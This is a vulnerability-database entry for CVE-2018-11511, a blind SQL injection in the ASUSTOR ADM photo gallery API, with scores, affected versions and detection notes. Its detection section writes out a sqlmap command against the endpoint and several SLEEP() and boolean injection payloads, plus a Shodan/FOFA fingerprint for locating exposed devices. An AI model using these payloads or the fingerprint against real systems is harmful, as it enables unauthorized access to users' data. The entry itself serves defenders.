cbcvebase.
CVE-2018-11511
published 2018-08-16


Priority: P179 · critical · CVSS 3.0: 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 11.18% (95.4th percentile)
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.

Affected (1 range)

Vendor     Product               Version range    Fixed in
asustor    asustor_data_master

Detection & IOCs (extracted from sources)

url: /photo-gallery/api/album/tree_lists/
url: /photo-gallery/api/photo/search/
command: sqlmap -u "https://<TARGET>/photo-gallery/api/album/tree_lists/" --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" --random-agent --risk=2 --dbms=mysql
command: album_id=106299411 AND SLEEP(5)&start=0&limit=100&order=name_asc&api=v2
command: keyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
command: album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
command: keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
  • Detect time-based blind SQLi attempts against the album_id POST parameter at /photo-gallery/api/album/tree_lists/ — look for SLEEP() payloads in POST body with duration >= 9 seconds response time.
  • Detect time-based blind SQLi attempts against the scope POST parameter at /photo-gallery/api/photo/search/ — look for SLEEP() payloads in POST body.
  • Boolean-based blind SQLi can also be detected via AND clause payloads such as 'AND 4644=4644' in the album_id parameter.
  • Use FOFA/Shodan fingerprinting to identify exposed ASUSTOR ADM instances as targets: search for body containing 'ASUSTOR' with icon_hash '1678170702'.
  • Both vulnerable endpoints (/photo-gallery/api/album/tree_lists/ and /photo-gallery/api/photo/search/) require POST requests with Content-Type: application/x-www-form-urlencoded; GET-based detection will miss this vulnerability.
  • The vulnerability affects ASUSTOR ADM 3.1.0.RFQ3 and all previous builds; the RCE (CVE-2018-11510) was patched in ADM 3.1.3 on May 31, 2018, but the SQLi (CVE-2018-11511) should also be addressed by upgrading to ADM 3.1.3.
  • The SQLi is blind (both boolean-based and time-based); no direct error output is returned, making detection reliant on response timing or differential boolean responses rather than error messages.

CVSS provenance

Source       Version   Score   Severity   Vector
nvd          v3.0      9.8     CRITICAL   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd          v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck              9.8     CRITICAL